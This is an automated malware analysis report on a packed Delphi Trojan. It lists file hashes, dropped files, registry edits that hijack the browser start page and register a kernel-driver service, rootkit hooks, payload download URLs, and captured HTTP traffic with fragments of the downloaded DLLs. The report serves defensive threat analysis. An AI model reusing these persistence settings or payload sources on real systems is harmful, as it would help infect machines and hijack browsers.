Gen.Variant.Symmi.63061_17b44c721d

by malwarelabrobot on September 23rd, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Symmi.63061 (B) (Emsisoft), Gen:Variant.Symmi.63061 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 17b44c721d60a9ef91291889a7b9f566
SHA1: 8648ffc188f2851d50bea74ef64a7f423a3e91a0
SHA256: 51c7de66879e1a2c07b6f896454122f397655749348f0504252cea494551889c
SSDeep: 24576:yTr8ufset+qv6FsTuLRC9LVUamQJ8Sxvzl5qjJ+S6b:yqa+qSFs6LQ9LVUAzJJ5q9+S
Size: 1015296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: iWin inc.
Created at: 1992-06-20 01:22:17 (PE TimeDateStamp shown in local time; this is the constant 0x2A425E19 = 1992-06-19 22:22:17 UTC that the Borland Delphi linker writes into every binary, not the real build date)
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2044

PID 2044 is the sample's own process. The RWX memory regions of this process dumped at the end of the report are consistent with the ASPack stub unpacking in place; no injection into a foreign process was recorded.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%WinDir%\JoYJKb\obTCfBhEA.dll (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jscript_jquery-1.4.2.min[1].js (2740 bytes)
%WinDir%\JoYJKb\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\175sf[1].htm (4364 bytes)
%WinDir%\CLOG.txt (5129 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%WinDir%\JoYJKb\NDTmWEYYA.tmp (12 bytes)
%System%\128b12\CDClient_EX.sys (125 bytes)
%WinDir%\JoYJKb\DbHnhAd.dll (12780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\style[1].css (17 bytes)
%WinDir%\KXQgMV.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%WinDir%\JoYJKb\NDTmWEYYA.tmp (0 bytes)
%System%\128b12\CDClient_EX.sys (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%WinDir%\KXQgMV.dll (0 bytes)
%WinDir%\JoYJKb\obTCfBhEA.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (0 bytes)
%WinDir%\JoYJKb\498E9.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

Registry activity

The process %original file name%.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"ImagePath" = "\DosDevices\%System%\128b12\CDClient_EX.sys"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"Devname" = "9P00FgsFjdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 77 CD 5F B0 7D 0C A7 A0 DC EC FE DF 49 A2 29"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90131381_hao_pg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"ErrorControl" = "1"
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are treated as Local intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all local sites not listed in other zones (host names without dots) are treated as Local intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are treated as Local intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

These three values are IE's default Local intranet zone options, so on their own they are a weak indicator; the start-page hijack to hao123.com and the driver service below are the stronger ones.

The driver service is registered for manual start (Start = 3, SERVICE_DEMAND_START), not automatic start; together with Type = 1 (SERVICE_KERNEL_DRIVER) above, this is a kernel driver the Trojan loads on demand rather than at boot:

[HKLM\System\CurrentControlSet\Services\9P00FgsFjdc]
"Start" = "3"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
4ceb86e184468879c0d20101cc99567d c:\WINDOWS\JoYJKb\DbHnhAd.dll
158b710a2ce07e3a34e46118f2ad39f2 c:\WINDOWS\JoYJKb\obTCfBhEA.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\%System%\128b12\iEwx6T7VPp9.sys" the Trojan monitors process creation and exit by installing a process-creation notifier (PsSetCreateProcessNotifyRoutine).
Using the driver "\DosDevices\%System%\128b12\iEwx6T7VPp9.sys" the Trojan monitors the loading of executable images into memory by installing a load-image notifier (PsSetLoadImageNotifyRoutine).
Using the driver "\DosDevices\%System%\128b12\iEwx6T7VPp9.sys" the Trojan monitors registry operations by installing a registry callback (CmRegisterCallback).
The Trojan installs the following kernel-mode hook(s):

ZwTerminateProcess

Note that the driver file name reported here (iEwx6T7VPp9.sys) differs from the ImagePath registered for service 9P00FgsFjdc above (CDClient_EX.sys), although both sit in %System%\128b12\. The directory, file and service names all look generated per run, so hunt on the pattern (a kernel-driver service whose ImagePath points into a short, random-looking subdirectory of %System%) rather than on these exact names. A hook on ZwTerminateProcess is typically used to stop a protected user-mode component from being killed.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 294912 115200 5.54249 ecf30aad1dd9927c1e98d6f7e77d1a35
DATA 299008 888832 882176 5.54492 74016918f11815e00744ffdba5765b47
BSS 1187840 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 1191936 8192 2048 5.07498 ba0c49d945d60d2878115fe83760ce00
.tls 1200128 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 1204224 4096 512 0.146134 3b0b537a506030303210ee9871d43d59
.reloc 1208320 24576 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 1232896 20480 5120 4.85916 cb0878068ff2e22b145fc87371f68ae1
.aspack 1253376 12288 9216 4.24392 88db9c40f23ade819e62a4c6a56eda32
.adata 1265664 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

The CODE/DATA/BSS/.idata/.tls/.rdata/.reloc/.rsrc names are the Borland (Delphi) linker's section layout and .aspack/.adata are ASPack's own sections, which confirms the PEiD verdict of an ASPack-packed Delphi binary. Sections with a raw size of 0 and the empty-input MD5 (d41d8cd98f00b204e9800998ecf8427e) have no bytes on disk and exist only in memory.

URLs

URL IP
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/ips1388.asp
hxxp://175.haodns123.cc/
hxxp://175.haodns123.cc/css/style.css
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js 183.60.200.84
hxxp://www.ip138.com/ips1388.asp 87.245.198.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.175sf.com/css/style.css 183.60.200.84
hxxp://www.go890.com/d2/x86.dll 87.245.198.83
hxxp://www.175sf.com/ 183.60.200.84
www.haosou.com 180.153.234.170


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

This is a generic packed-binary signature, not a packer identification: in the response bodies below, x86.dll carries UPX0/UPX1 section names and a "3.91 UPX!" marker, and CDClient.dll carries the "PEC2" marker of PECompact 2.x together with the Delphi "This program must be run under Win32" stub. Note also that CDClient.dll as served begins with "DU" where a PE file begins with "MZ" (the following "P" is the usual Delphi "MZP" header), so the downloaded file is not loadable until those two bytes are rewritten by whatever consumes it.

Traffic (URLs and Host headers below are defanged by the report: "hXXp" stands for http and "VVV" for www)

GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 14:51:16 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L...]..W...........!........
..............................................................@.......
..........................................................|...........
................................H.....................................
......UPX0....................................UPX1....................
[email protected]...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!...........c.........B..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.....8.9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M

<<< skipped >>>

GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 13:31:07 GMT
Server: kangle/2.9.6
Last-Modified: Thu, 22 Sep 2016 13:01:05 GMT
Content-Type: application/octet-stream
Content-Length: 855040
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
[email protected]............
..................................."..P............................@..
......................................................................
..............CODE....................PEC2^O...... ....rsrc....0......
.&.................. ....reloc.......@......................@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
................................................b.. .........c....X...
......b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i..
...8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?
[email protected]...."..\...3KO.w.....V.....^.#b.l......<.q.C<....
...].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}..I..
.Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R....
...O.....X}lC1L=.. ..O..b.<.W.l"c.2...w.,L]........F.........W...iy
I.)......^......'...2..U_Z.t.#...O..e.'d*dr.4.X..Rn...j.q. .....L.

<<< skipped >>>

GET /ips1388.asp HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 18:37:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9659
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQRSQRR=PJCKFDFGOMBEKMFFCFGLKOCN; path=/
Cache-Control: private
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<HTML>..<HEAD>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta http-equiv="mobile-agent" c
ontent="format=html5; url=hXXp://m.ip138.com/ip.html"/>..<TITLE&
gt;IP........--.................. | ............ | ............ | ....
....................</TITLE>..<META NAME="Generator" CONTENT=
"ip,IP....,IP........,ip138,........">..<META NAME="Author" CONT
ENT="ip138,........">..<META NAME="Keywords" CONTENT="ip,IP....,
IP........,ip138,........">..<META NAME="Description" CONTENT="i
p,IP....,IP........,ip138,........">..<SCRIPT LANGUAGE="JavaScri
pt">..<!--..function checkIP()..{...var ipArray,ip,j;...ip = doc
ument.ipform.ip.value;...if (ip.indexOf(" ")>=0){....ip = ip.replac
e(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase
().indexOf("hXXp://")==0){....ip = ip.slice(7);....document.ipform.ip.
value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip
= ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip
.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.
ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((
ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)
|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(b
id)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|
(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(

<<< skipped >>>

GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Sep 2016 18:37:11 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...&
gt;..._,..L.,.{....$r...2"...................o.-....E.\7...".........i
.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......
h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....
)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1.......
...<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7
kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(....
..,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E
"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN...
"<....OOq...U..XY.v.."..f.K..k...........B}.<?............`.....
.`.9..Ho.....W.5&.w..A [email protected].\..].\..#.,
.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ..
....4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.m
v...f5v...p.`....i..T......~..`0k..t...........5......S...`...........
.....t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h..
..q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....
).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U..
[email protected]\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....
7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3
.4R. .c.&..]...o....T..... ..".8....p :[email protected]..:==Y...M.
...Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od
)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Sep 2016 18:37:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Thu, 22 Sep 2016 13:40:00 GMT
Content-Encoding: gzip
3d3f.............}.s.Y...vD...vj...#.....DWu.lEO..Tw........H.d....>
;...>...F.....o%.T H....W!!@ .\...l..........IJ.&.9..zhw..-...|.s.w
;.9.g...O.....R............SA.....$.........?.....o..P$....h.[.&......
..!..Y,..wv....G$B.Po......{.pq..)K..B.E.q..?9]nqt.`4..q.B.T...?..4...
.....Oi.../[email protected].!..t.},z.A{6..=.l.
..{..Y.n...E../BF.....N......=9..M..2;.D.............DF...L...c#.!....
A....~...Y=...n.y...9.i.._.L..t....2..........'.._.......$.....Eb./S.D
b..[.Jk.d..$@5....._.....[.......=uA;[email protected]?..o...r.Ao.....=g::
.fs..2f...W...%..x.....3....:..R..o?.....'0...;.....=u....vh..!.....z.
...e..}..*..gOw....7a.J..`....~..??.3lTC..8..~...@..':.}...'.fN...O...
....vV.M..6i...?;u.ui.t...../......).........@.......}NtP.A}T.[1.-....
9x.....zx...pd.b..a#E\......H>.{.5.K4js..._R.AS...m...1l.9....Q...F
[email protected]].jPO....T....P..R%. D...HD.><).H.._..T....
!.....'.F.I.....Q#u.d......5....D.W..<I_l./.......z...vD....'NvJd".
S...c3.I?.....'.v.s./.]-..ZU.....5...9.Q............>.......<.mP
.. ..h.1..............^...j.T...... |U.*.../M62...G6....D.g.......zm.W
]f.T=jg.Y..R....b.W_.^....tJ......W.w..lp;....x[1.m...t.....6.....9...
...ti)..p...Y.j..............(..:.9j..Y .J..........;.?.Y.Um..z.>..
.w.....q....c..s0...*...x.CMM..!....N..........2.T...`-.!..H....3.....
.....E.m..F....L.A.=..nJ......^....yP...{....4....-....h..D(;.5wnd....
........Eee.U.G..d.Z....;){.~...5.Y..v...D$.u.m.>.|....LT.Y...w...K
Z.....|.Q...5....V9t...}...n.....:m?!Q.W...d.. .y.h.....g.3I;=.PE.

<<< skipped >>>

GET /css/style.css HTTP/1.1

Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Sep 2016 18:37:10 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 23 Jun 2016 10:01:38 GMT
Content-Encoding: gzip
b2a...............n......?..,.....(KZ.....Q.2.J...A...5%...^;.c..T....
[email protected]./....sf..(.:....`9.s.s...~.G....7...f.g.x52.g..,]..M|....^. .
..]...x^..F.<...o.?Z.... {f.2NnG...}......'.....#.,:.../G.'&...;9.z
.9:>._.LN..#c..".:^...-H.0.:y..l..$.W..,./r.\..y.TL&.L.G..-..QF.O.$
.(..$.h.f~...8.W..$f....|".8).5.....t...q~..}...Vg..uR:62.....4.w%._B.
..T...k?....}.....K.M.../.9....o............[........m..jI...a.(..8...
n,.To...|F.....(.....I.. ....q&._L..l".'..j. .L-"..2k..sW8@:i.#..W.,-T
...:K>.v?'_...}.K.y.}....b..>..Ig`.o........q5........r.w.......
.1;@f}...].0....95...V..`..Q...3.......yH.'.c.NNN.%.t..U....{tK.h:"..1
.,..c"`o.EA...r.x..z..1...=U....i%:.p.3..3.1.9..n_.......w.?.n....V...
4....FZ....*Q......r...].g.$.2QZm......g..0.2..k ..s nn.$...S..[..f.
...fi^.T...B..(.$T.3\^ R..wq.....llE}..P..e.W...%._..D...cc.$...R... .
.fd,.0.V.......#..w.&.z.`..G] . C.....{.`...G..9....p...r.x.h..N(....:
